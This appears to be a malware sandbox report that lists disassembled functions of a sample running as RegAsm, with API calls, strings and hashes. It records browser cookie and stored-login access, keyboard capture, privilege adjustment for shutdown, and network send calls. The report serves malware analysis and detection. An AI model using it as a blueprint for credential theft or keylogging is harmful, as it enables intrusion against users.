Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: lJD$lJD$lJD
API String ID: 745075371-479184356
Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69

Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
FindClose.KERNEL32(00000000), ref: 0040C47D
FindClose.KERNEL32(00000000), ref: 0040C4A8

Strings

\Mozilla\Firefox\Profiles\, xrefs: 0040C36E
AppData, xrefs: 0040C358
\cookies.sqlite, xrefs: 0040C409

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 1164774033-405221262
Opcode ID: 66fe6d6053e6612d2a3ee79fceeb28f858ac6dc921cc8d7f836653099c7867af
Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
Opcode Fuzzy Hash: 66fe6d6053e6612d2a3ee79fceeb28f858ac6dc921cc8d7f836653099c7867af
Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D

Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B

Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371

GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68

Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E

Strings

NG, xrefs: 00419B25
PXG, xrefs: 00419CC8
8.v, xrefs: 00419BD5
PXG, xrefs: 00419E2E
8SG, xrefs: 00419BEB

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: 8.v$8SG$PXG$PXG$NG
API String ID: 341183262-1946876467
Opcode ID: 7fef2379e4e742451bf4fe050d5fbcba49b35e47e559bec9f56e5d533a00cd16
Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
Opcode Fuzzy Hash: 7fef2379e4e742451bf4fe050d5fbcba49b35e47e559bec9f56e5d533a00cd16
Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A

Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0040A416
GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
GetKeyboardLayout.USER32 ref: 0040A429
GetKeyState.USER32(00000010), ref: 0040A433
GetKeyboardState.USER32(?), ref: 0040A43E
ToUnicodeEx.USER32 ref: 0040A461
ToUnicodeEx.USER32 ref: 0040A4C1
ToUnicodeEx.USER32 ref: 0040A4FA

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
String ID:
API String ID: 1888522110-0
Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6

Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
RegCloseKey.ADVAPI32(?), ref: 004140A9

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
GetProcAddress.KERNEL32(00000000), ref: 00414271

Strings

SHDeleteKeyW, xrefs: 00414260
Shlwapi.dll, xrefs: 00414265

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: 00a7264d58bfa481f8c6f157302ac05ce7176e263a7f0d83558ee08137274e1e
Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
Opcode Fuzzy Hash: 00a7264d58bfa481f8c6f157302ac05ce7176e263a7f0d83558ee08137274e1e
Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA

Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00449212
_free.LIBCMT ref: 00449236
_free.LIBCMT ref: 004493BD
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758

Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D

ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
GetProcAddress.KERNEL32(00000000), ref: 00416872

Strings

PowrProf.dll, xrefs: 00416866
SetSuspendState, xrefs: 00416861
!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: !D@$PowrProf.dll$SetSuspendState
API String ID: 1589313981-2876530381
Opcode ID: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
Opcode Fuzzy Hash: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE

Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513

Strings

OCP, xrefs: 00452490
['E, xrefs: 004524F3, 004524CA
ACP, xrefs: 0045245A

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP$['E
API String ID: 2299586839-2532616801
Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398

Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
GetLastError.KERNEL32 ref: 0040BA58

Strings

[Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
UserProfile, xrefs: 0040BA1E
[Chrome StoredLogins not found], xrefs: 0040BA72

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
Opcode Fuzzy Hash: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE

Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
OpenProcessToken.ADVAPI32(00000000), ref: 00417966
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
GetLastError.KERNEL32 ref: 0041799D

Strings

SeShutdownPrivilege, xrefs: 00417972

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5

Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409258

Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00164960,00000010), ref: 004048E0

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

__CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
FindClose.KERNEL32(00000000), ref: 004093C1

Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C

FindClose.KERNEL32(00000000), ref: 004095B9

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
String ID:
API String ID: 1824512719-0
Opcode ID: b872af409f18d4e2bb7bbba0f0478c6e37307eeb8e5c6a27a813a89ef4a7cb37
Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
Opcode Fuzzy Hash: b872af409f18d4e2bb7bbba0f0478c6e37307eeb8e5c6a27a813a89ef4a7cb37
Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98

Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9

Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 0041B4B9
LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3

Strings

SETTINGS, xrefs: 0041B4AC

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8

Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040966A
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: 4a325c590a34807a26d63d289d9f2ec3f664a0255ff010795f7d94bc543c6bf4
Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
Opcode Fuzzy Hash: 4a325c590a34807a26d63d289d9f2ec3f664a0255ff010795f7d94bc543c6bf4
Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58

Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408811
FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
__CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: b567b387b19c3842d3e3fd3ce298d840e85eb04b560dfe416f5b5c0f2df3b91c
Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
Opcode Fuzzy Hash: b567b387b19c3842d3e3fd3ce298d840e85eb04b560dfe416f5b5c0f2df3b91c
Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99

Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Strings

XPG, xrefs: 0040793A
XPG, xrefs: 00407877

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: XPG$XPG
API String ID: 4113138495-1962359302
Opcode ID: 06ba235b626d91e9aea2dab097dc785c8d539800fe50474cd0f35ed5c856e27b
Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
Opcode Fuzzy Hash: 06ba235b626d91e9aea2dab097dc785c8d539800fe50474cd0f35ed5c856e27b
Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B

Function 00451CD8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB

Strings

sJD, xrefs: 00451DD1, 00451E19, 00451EC1

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
String ID: sJD
API String ID: 1661935332-3536923933
Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769

Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281

